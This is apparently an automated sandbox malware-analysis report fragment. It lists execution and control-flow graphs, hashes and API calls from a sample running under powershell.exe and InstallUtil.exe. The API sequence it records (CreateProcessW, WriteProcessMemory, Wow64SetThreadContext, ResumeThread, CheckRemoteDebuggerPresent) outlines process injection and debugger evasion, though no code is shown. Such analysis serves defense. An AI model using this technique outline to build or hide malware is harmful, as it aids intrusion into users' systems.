                                                  execution_graph 3498 7ff848d38529 3499 7ff848d38537 ResumeThread 3498->3499 3501 7ff848d3860c 3499->3501 3520 7ff848d37e39 3522 7ff848d37e47 Wow64SetThreadContext 3520->3522 3523 7ff848d37f91 3522->3523 3488 7ff848d3833d 3490 7ff848d3834b WriteProcessMemory 3488->3490 3491 7ff848d384c4 3490->3491 3514 7ff848d35ff2 3515 7ff848d35ffd 3514->3515 3516 7ff848d37bf1 CreateProcessW 3515->3516 3519 7ff848d360f3 Wow64SetThreadContext 3515->3519 3516->3519 3518 7ff848d37f91 3519->3518 3492 7ff848d37a01 3493 7ff848d37a30 CreateProcessW 3492->3493 3495 7ff848d37cc0 Wow64SetThreadContext 3493->3495 3497 7ff848d37f91 3495->3497 3502 7ff848d365f5 3503 7ff848d365ff 3502->3503 3504 7ff848d36842 3503->3504 3507 7ff848d36852 3503->3507 3508 7ff848d35ff0 3504->3508 3509 7ff848d35ff5 3508->3509 3510 7ff848d37bf1 CreateProcessW 3509->3510 3513 7ff848d360f3 Wow64SetThreadContext 3509->3513 3510->3513 3512 7ff848d36850 3512->3507 3513->3512

                                                  Control-flow Graph

                                                  control_flow_graph 89 7ff848e0091e-7ff848e0092b 91 7ff848e0092d-7ff848e00942 89->91 91->91 92 7ff848e00944-7ff848e0097a 91->92 95 7ff848e009c4-7ff848e009cb 92->95 96 7ff848e0097c-7ff848e009a4 92->96 102 7ff848e009cd-7ff848e009d2 95->102 98 7ff848e00b93-7ff848e00c45 96->98 99 7ff848e009aa-7ff848e009b4 96->99 137 7ff848e00c47 98->137 138 7ff848e00c48-7ff848e00c59 98->138 101 7ff848e009b6-7ff848e009c3 99->101 99->102 101->95 101->102 105 7ff848e00b34-7ff848e00b3e 102->105 106 7ff848e009d8-7ff848e009db 102->106 108 7ff848e00b40-7ff848e00b4c 105->108 109 7ff848e00b4d-7ff848e00b90 105->109 110 7ff848e009f2-7ff848e009f6 106->110 111 7ff848e009dd-7ff848e009e6 106->111 109->98 110->105 117 7ff848e009fc-7ff848e00a33 110->117 111->110 127 7ff848e00a57 117->127 128 7ff848e00a35-7ff848e00a55 117->128 130 7ff848e00a59-7ff848e00a5b 127->130 128->130 130->105 132 7ff848e00a61-7ff848e00a64 130->132 135 7ff848e00a66-7ff848e00a79 132->135 136 7ff848e00a7b 132->136 140 7ff848e00a7d-7ff848e00a7f 135->140 136->140 137->138 141 7ff848e00c5c-7ff848e00c69 138->141 142 7ff848e00c5b 138->142 140->105 145 7ff848e00a85-7ff848e00abf 140->145 143 7ff848e00ccd-7ff848e00ce4 141->143 144 7ff848e00c6b 141->144 142->141 148 7ff848e00e1d-7ff848e00e3d 143->148 149 7ff848e00cea-7ff848e00cf4 143->149 147 7ff848e00e3e-7ff848e00ecd 144->147 175 7ff848e00ac1-7ff848e00ace 145->175 176 7ff848e00ad8-7ff848e00ade 145->176 204 7ff848e00ed0-7ff848e00ee1 147->204 205 7ff848e00ecf 147->205 148->147 152 7ff848e00cf6-7ff848e00d03 149->152 153 7ff848e00d0d-7ff848e00d12 149->153 152->153 163 7ff848e00d05-7ff848e00d0b 152->163 156 7ff848e00dbe-7ff848e00dc8 153->156 157 7ff848e00d18-7ff848e00d1b 153->157 161 7ff848e00dd7-7ff848e00e1a 156->161 162 7ff848e00dca-7ff848e00dd6 156->162 164 7ff848e00d32-7ff848e00d36 157->164 165 7ff848e00d1d-7ff848e00d26 157->165 161->148 163->153 164->156 172 7ff848e00d3c-7ff848e00d3f 164->172 165->164 173 7ff848e00d66 172->173 174 
7ff848e00d41-7ff848e00d55 172->174 180 7ff848e00d68-7ff848e00d6a 173->180 194 7ff848e00d56-7ff848e00d64 174->194 175->176 184 7ff848e00ad0-7ff848e00ad6 175->184 181 7ff848e00ae0-7ff848e00af8 176->181 182 7ff848e00afa-7ff848e00afd 176->182 180->156 186 7ff848e00d6c-7ff848e00d7a 180->186 181->182 189 7ff848e00b04-7ff848e00b0d 182->189 184->176 186->194 197 7ff848e00d7c-7ff848e00d88 186->197 192 7ff848e00b26-7ff848e00b33 189->192 193 7ff848e00b0f-7ff848e00b24 189->193 193->192 194->180 202 7ff848e00d8e-7ff848e00d97 197->202 206 7ff848e00db0-7ff848e00dbd 202->206 207 7ff848e00d99-7ff848e00da6 202->207 208 7ff848e00ee4-7ff848e00f74 204->208 209 7ff848e00ee3 204->209 205->204 207->206 211 7ff848e00da8-7ff848e00dae 207->211 216 7ff848e010d2-7ff848e010fb 208->216 217 7ff848e00f7a-7ff848e00f84 208->217 209->208 211->206 218 7ff848e00f86-7ff848e00f93 217->218 219 7ff848e00f9d-7ff848e00fa2 217->219 218->219 227 7ff848e00f95-7ff848e00f9b 218->227 222 7ff848e01073-7ff848e0107d 219->222 223 7ff848e00fa8-7ff848e00fab 219->223 225 7ff848e0107f-7ff848e0108b 222->225 226 7ff848e0108c-7ff848e010cf 222->226 228 7ff848e00fc2-7ff848e00fc6 223->228 229 7ff848e00fad-7ff848e00fb6 223->229 226->216 227->219 228->222 234 7ff848e00fcc-7ff848e00fcf 228->234 229->228 236 7ff848e00fe6 234->236 237 7ff848e00fd1-7ff848e00fe4 234->237 238 7ff848e00fe8-7ff848e00fea 236->238 237->238 238->222 240 7ff848e00ff0-7ff848e00ff6 238->240 242 7ff848e01012-7ff848e01018 240->242 243 7ff848e00ff8-7ff848e01005 240->243 246 7ff848e01034-7ff848e01072 242->246 247 7ff848e0101a-7ff848e01032 242->247 243->242 248 7ff848e01007-7ff848e01010 243->248 247->246 248->242
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e514e976062b2a4ceaa88afd98fb585a47a206e322aa8907f659173b1b691c1c
                                                  • Instruction ID: db4cf26c5031070015596e4c860abe9530c713a3973f417f9240dfd5890f0da9
                                                  • Opcode Fuzzy Hash: e514e976062b2a4ceaa88afd98fb585a47a206e322aa8907f659173b1b691c1c
                                                  • Instruction Fuzzy Hash: 87425631E0EA9A4FE7A6BA2818152B57BE1FF57394F0805BBC04DC71D3EE289C058356

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147068284.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848d30000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: L_I
                                                  • API String ID: 0-1627180413
                                                  • Opcode ID: 512486c203dde9f3f945566ab9039396dad2674f6652fb1cfe3e1170a429e5a4
                                                  • Instruction ID: df3fd34f55567dc89ea3bcd3fbeae46a5abc679d7f2ee33950b6986d7001bb86
                                                  • Opcode Fuzzy Hash: 512486c203dde9f3f945566ab9039396dad2674f6652fb1cfe3e1170a429e5a4
                                                  • Instruction Fuzzy Hash: C1025770D09A5D8FEB98DF58D849BE9BBF1FB69300F1041AED009E3295DB74A985CB40

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147068284.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848d30000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: d27f6375ff4e05fc04bcc72dcc2872a9092c0e493bbca7bfa1ed428e714e02dd
                                                  • Instruction ID: 3e1e82816ec9c9f61b580c43414a6cbd9adcd9c654f2b098e25a6ec538769a46
                                                  • Opcode Fuzzy Hash: d27f6375ff4e05fc04bcc72dcc2872a9092c0e493bbca7bfa1ed428e714e02dd
                                                  • Instruction Fuzzy Hash: 49A11670909A5D8FDB99DF18C894BE9BBF1FB69301F0001AED40AE3291DB759984CF40

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147068284.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848d30000_powershell.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 63a965c7390342952b8be25bdae80fba08aeb550ad5176d1f6dc529cf97bb9a1
                                                  • Instruction ID: 0f31ba3f1a250261478bee5bab7cbe5d7737ae84a29aaa1f9b6c74609d73ff94
                                                  • Opcode Fuzzy Hash: 63a965c7390342952b8be25bdae80fba08aeb550ad5176d1f6dc529cf97bb9a1
                                                  • Instruction Fuzzy Hash: 9D611370908A5C8FDB98DF98C884BE9BBF1FB69310F1041AED44DE3291DB74A985CB44

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147068284.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848d30000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: a55a4fd8d1e575d9e790c7ea7b32293e127c9e2aec67ca9d717c821619e38e2c
                                                  • Instruction ID: 5875cb439f2ad21012d3fd5a0f800e23dfabcb0cf0690e9409c61230fd5d6f60
                                                  • Opcode Fuzzy Hash: a55a4fd8d1e575d9e790c7ea7b32293e127c9e2aec67ca9d717c821619e38e2c
                                                  • Instruction Fuzzy Hash: EC518F70D08A4D8FEB55DFA8C844BE9BBF1FB66311F1482AAD048D7256C7749889CF50

                                                  Control-flow Graph

                                                  Control-flow graph (rendered image; graph residue removed). Function start: 7ff848d38529. API call: ResumeThread.
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147068284.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848d30000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 83e4783fd93001251ccd741877afc29ddb0040e99331bbcd5f90c8b3decf95f4
                                                  • Instruction ID: b722a2b65533021350e5eba10f50f86351b62de9e74f5b9859efb7de926ad920
                                                  • Opcode Fuzzy Hash: 83e4783fd93001251ccd741877afc29ddb0040e99331bbcd5f90c8b3decf95f4
                                                  • Instruction Fuzzy Hash: 2941497090C64C8FDB59DF98D895BA9BBF0EB5A310F1041AED049E7252DB70A885CB41

                                                  Control-flow Graph

                                                  Control-flow graph (rendered image; graph residue removed). Function start: 7ff848e009ea. No API calls referenced.
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 681745b019fc758811528899ca6a846210e01854c91c3acbde3051e196b835d5
                                                  • Instruction ID: 60ae90e61cd03b474f68afe23aef5841e030b974bceb172f3f28460ee1f7439a
                                                  • Opcode Fuzzy Hash: 681745b019fc758811528899ca6a846210e01854c91c3acbde3051e196b835d5
                                                  • Instruction Fuzzy Hash: CB41E221E1EA9B4FF3AAB628045527966E1FF522A9F5805B9C40DD31D3EF2CE804430A

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3f2741dbeb3ff71e330719b3732c699db8c6a40e85c7b2d0f2d69909e8da7f53
                                                  • Instruction ID: f24a46bd8d2d97f615353c139a38265f06a52c756cd16547b7c6283cc12ddea6
                                                  • Opcode Fuzzy Hash: 3f2741dbeb3ff71e330719b3732c699db8c6a40e85c7b2d0f2d69909e8da7f53
                                                  • Instruction Fuzzy Hash: E331C432F0CA294FEBA5A95C64116B9B2D2FF55760F5805BBC50EC7287EF199C048289

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 629b9e32802602932f2cb931c75212ca35af6ae7f2d487936fd76368b708f20f
                                                  • Instruction ID: 8340ed165c31995f5e79cb16762b0e925e9ab473b0664650fddea0686ec50eb9
                                                  • Opcode Fuzzy Hash: 629b9e32802602932f2cb931c75212ca35af6ae7f2d487936fd76368b708f20f
                                                  • Instruction Fuzzy Hash: 1A213732F0D9294FEBA5A6AC64052F8B3D1FF956A0F1806B7C41DC318BEF28AC054384

                                                  Control-flow Graph

                                                  Control-flow graph (rendered image; graph residue removed). Function start: 7ff848e00d2a. No API calls referenced.
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d894689c4f2cfa0d1240065fd0f99c25f749fe1ceb02f96aefd8b8ffa1a67658
                                                  • Instruction ID: cdfec940228ad38479b493342170b2d76457c1be45b508bc4b8e5e99b62da14f
                                                  • Opcode Fuzzy Hash: d894689c4f2cfa0d1240065fd0f99c25f749fe1ceb02f96aefd8b8ffa1a67658
                                                  • Instruction Fuzzy Hash: 2011C222E1DA3E4FF7A9B52C14592B552C2FF95295F040576D40DC3196FF28BC0542A9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd0c15ae2e4c2638a34b2ab8264f5f988bbc563ade817dcbda58821b1603f764
                                                  • Instruction ID: 5af418fcf9d75d87fe98ca4feaff3c1d67dc1041312c5adc47633a8a0ffc8283
                                                  • Opcode Fuzzy Hash: cd0c15ae2e4c2638a34b2ab8264f5f988bbc563ade817dcbda58821b1603f764
                                                  • Instruction Fuzzy Hash: 8C01F922F1DE3A1FF7AAB51C14152B891D2FF96391F58097AC50EC7287EF199C045249
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cb8d1d08f853962db393d41e1f618ebb08f2bd020e8206c268c6bed067a5e550
                                                  • Instruction ID: 3a462fb58177e4b861f7eddc660aecc2f314c47d1c3c087c584fdbe5c96b73d2
                                                  • Opcode Fuzzy Hash: cb8d1d08f853962db393d41e1f618ebb08f2bd020e8206c268c6bed067a5e550
                                                  • Instruction Fuzzy Hash: C6F09631B1CA184FE768DB1C9805179B7E2FBD9125B04427FD04FD3562DF25D8024745
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147415354.00007FF848E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848e00000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d0a870914dc4c33a07a6c6b4a065fce36c8142aaeb2a4a7263bf448522cea7c6
                                                  • Instruction ID: 92e4a126dfbc09a3cec1c0bdb9f9d4d1454a7f8691588ac351a4d97b07fcb79f
                                                  • Opcode Fuzzy Hash: d0a870914dc4c33a07a6c6b4a065fce36c8142aaeb2a4a7263bf448522cea7c6
                                                  • Instruction Fuzzy Hash: 0CF02722F1D97D5FE2E6B1AC24091F466D1FF65AA0F5806B2D91CC328BFE285C190385
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2147068284.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff848d30000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: efa08c337c7e9bb0c5884bf8a60ca20ead1a0122eddf2468000dc833c90df470
                                                  • Instruction ID: aac93b70bb90c9c7fd1b81592efe7a7339401672154d8bbb5dfcfd8eabe53857
                                                  • Opcode Fuzzy Hash: efa08c337c7e9bb0c5884bf8a60ca20ead1a0122eddf2468000dc833c90df470
                                                  • Instruction Fuzzy Hash: 22822871D096298FEBA8EB14D895BE9B7B1FF58340F4041FAD00DA3291DB346A89CF54

                                                  Execution Graph

                                                  Execution Coverage:12.4%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:2.6%
                                                  Total number of Nodes:116
                                                  Total number of Limit Nodes:14
                                                  Execution graph (rendered image; graph residue removed). API calls referenced: LoadLibraryExW, GetModuleHandleW, GlobalMemoryStatusEx, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CheckRemoteDebuggerPresent, DuplicateHandle.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $cq$$cq$$cq$$cq$$cq$$cq
                                                  • API String ID: 0-2877684506
                                                  • Opcode ID: e119d9aa341f38f58dd1ca09544d5ab0fb2cc72024adf04d72e4d747c4446ea9
                                                  • Instruction ID: 48c23fff80b26385ac04820b4d4149a5bd63d1ee59d1d21df1268f066d77b5be
                                                  • Opcode Fuzzy Hash: e119d9aa341f38f58dd1ca09544d5ab0fb2cc72024adf04d72e4d747c4446ea9
                                                  • Instruction Fuzzy Hash: A2D26B34E10605CFDF64DF68C588A9DB7B2FF89300F5485AAD449AB2A5DB71ED81CB80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $cq$$cq$$cq$$cq$$cq$$cq
                                                  • API String ID: 0-2877684506
                                                  • Opcode ID: 1f926b7cc1c67cf7812eb5f2581e7483eb90bcf882274153068c7cacbdefb382
                                                  • Instruction ID: f75015809014507e92757ed2f037547dd8388402028f5bf451ecc6489d644bf9
                                                  • Opcode Fuzzy Hash: 1f926b7cc1c67cf7812eb5f2581e7483eb90bcf882274153068c7cacbdefb382
                                                  • Instruction Fuzzy Hash: 45529F74E141098FEF64DB68D5807AEB7B2EB85310F20892AE405DB3D5DBB6DC81CB91

                                                  Control-flow Graph

                                                  Control-flow graph (rendered image; graph residue removed). Function start: 6107e50. Internal calls to 6106670; no API calls referenced.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $cq$$cq
                                                  • API String ID: 0-2695052418
                                                  • Opcode ID: 155234318db92e1383e804a9bb1a85e0f73b7d6c82b60984a83be7c493b0e960
                                                  • Instruction ID: 77859c0061a8fe658581731bfdd50f0cc9c8345932bb0426012243ab81f88bde
                                                  • Opcode Fuzzy Hash: 155234318db92e1383e804a9bb1a85e0f73b7d6c82b60984a83be7c493b0e960
                                                  • Instruction Fuzzy Hash: B902AB30B042059FEF99DB68D9906AEB7B2FF84310F148929E415DB395DB71EC86CB80

                                                  Control-flow Graph

                                                  • Rendered control-flow graph omitted; its basic blocks were marked Executed / Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: 73360808549d3eaa85d248f995288142f357b684bc43393a6ff4ddc04a93ebf4
                                                  • Instruction ID: c8153dd80483b9f17b86be5764b61067644d738534858bae60bdd94366541dd0
                                                  • Opcode Fuzzy Hash: 73360808549d3eaa85d248f995288142f357b684bc43393a6ff4ddc04a93ebf4
                                                  • Instruction Fuzzy Hash: 8322AF75E002199BEF64DBA4C6406AEBBB3FF88320F24856AD405AB394DB71DC41CF90
                                                  APIs
                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00BC7127
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3315392519.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_bc0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: 8cffd1fcd60010fd19608c60d41e2e556ae2deb660d08f9ecedef83678db7882
                                                  • Instruction ID: 7ee3f7f6c29ea12417a90a1200a3e2e436b447b24de0b52fdfc3d6056edd963c
                                                  • Opcode Fuzzy Hash: 8cffd1fcd60010fd19608c60d41e2e556ae2deb660d08f9ecedef83678db7882
                                                  • Instruction Fuzzy Hash: 8B2128B68002598FCB10CF9AD884BEEFBF4EF49310F14845AE455B3251D778A944CF61
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4c6d1aa37ffc835d149a9c99a6312610cac7106cf717b84d48d96625ac96c61
                                                  • Instruction ID: d6d0dda5dd3b0b9d780d21c68a026c5841d59f3d853ff9137b7ec50200a3202a
                                                  • Opcode Fuzzy Hash: e4c6d1aa37ffc835d149a9c99a6312610cac7106cf717b84d48d96625ac96c61
                                                  • Instruction Fuzzy Hash: 6562AC34A002048FEF55DB68D594BAEB7F2EF88310F248869E406DB395DB75ED52CB90
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a4673fa238197d435355a60488de47dabcbc9b3121041f541363e41a7bf455f1
                                                  • Instruction ID: 4ed4761a1d1f56243714b18336bffec712737d76c55a7c212a04fff0f59257d9
                                                  • Opcode Fuzzy Hash: a4673fa238197d435355a60488de47dabcbc9b3121041f541363e41a7bf455f1
                                                  • Instruction Fuzzy Hash: 32326E74B102059FEF55DB68D980BAEB7B2FB88310F108A29E405EB395DB75DC428F91

                                                  Control-flow Graph

                                                  • Rendered control-flow graph omitted; its basic blocks were marked Executed / Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                  • API String ID: 0-3377385791
                                                  • Opcode ID: 4f1c8d713d8fd2c2c435bed72ef5ad219ca02e1770dc701fc931d5278aadd742
                                                  • Instruction ID: 1994e64cf858928d3db514b8ad51263840be296990dbc2c696edf876dd5e2c94
                                                  • Opcode Fuzzy Hash: 4f1c8d713d8fd2c2c435bed72ef5ad219ca02e1770dc701fc931d5278aadd742
                                                  • Instruction Fuzzy Hash: 38E17030E102098FEF55DF69D5906AEB7B6FF85300F508929E405EB396DBB1AC42CB91

                                                  Control-flow Graph

                                                  • Rendered control-flow graph omitted (graph nodes reference GetCurrentProcess, GetCurrentThread and GetCurrentThreadId); its basic blocks were marked Executed / Not Executed
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 060F6E96
                                                  • GetCurrentThread.KERNEL32 ref: 060F6ED3
                                                  • GetCurrentProcess.KERNEL32 ref: 060F6F10
                                                  • GetCurrentThreadId.KERNEL32 ref: 060F6F69
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 828d06024d4e555882184875b45662def1713fdc388f4f638f95a89a964ae2a9
                                                  • Instruction ID: 22a718a3a244b00b70ef2e4548299f228d2ba1ff3de4df91cc1f792ba05e6d67
                                                  • Opcode Fuzzy Hash: 828d06024d4e555882184875b45662def1713fdc388f4f638f95a89a964ae2a9
                                                  • Instruction Fuzzy Hash: A15174B19103098FDB54CFA9D948B9EBFF1EF88310F20845AE109AB3A1D7756984CB25

                                                  Control-flow Graph

                                                  • Rendered control-flow graph omitted (graph nodes reference GetCurrentProcess, GetCurrentThread and GetCurrentThreadId); its basic blocks were marked Executed / Not Executed
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 060F6E96
                                                  • GetCurrentThread.KERNEL32 ref: 060F6ED3
                                                  • GetCurrentProcess.KERNEL32 ref: 060F6F10
                                                  • GetCurrentThreadId.KERNEL32 ref: 060F6F69
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 2202980db375293e7718ce4163e13d5809ec57bc0ec2f563d38088a1e390d82f
                                                  • Instruction ID: e287a6a0b2344c34ad476677702c834faf243ccdc42ee735149d39fe69c9e500
                                                  • Opcode Fuzzy Hash: 2202980db375293e7718ce4163e13d5809ec57bc0ec2f563d38088a1e390d82f
                                                  • Instruction Fuzzy Hash: 8C5165B19102098FDB54CFAAD948B9EBFF1EF88310F208459E509A7390D7756944CB25

                                                  Control-flow Graph

                                                  • Rendered control-flow graph omitted; its basic blocks were marked Executed / Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $cq$$cq$$cq$$cq
                                                  • API String ID: 0-2876200767
                                                  • Opcode ID: 158054fc46a4873cf68f2acc35aac18234db56a92ceae76242868c04dbdf4b3d
                                                  • Instruction ID: a7fb76ae913424d351a60edabb09f4f95b0fd8c9248594aaf5662d2b5623b3e5
                                                  • Opcode Fuzzy Hash: 158054fc46a4873cf68f2acc35aac18234db56a92ceae76242868c04dbdf4b3d
                                                  • Instruction Fuzzy Hash: 12915234B0060A8FEF55DB65D9607AF73B6EFC4200F108969D809EB399EF719D428B91

                                                  Control-flow Graph

                                                  • Rendered control-flow graph omitted; its basic blocks were marked Executed / Not Executed
                                                  Strings
                                                  Memory Dump Source
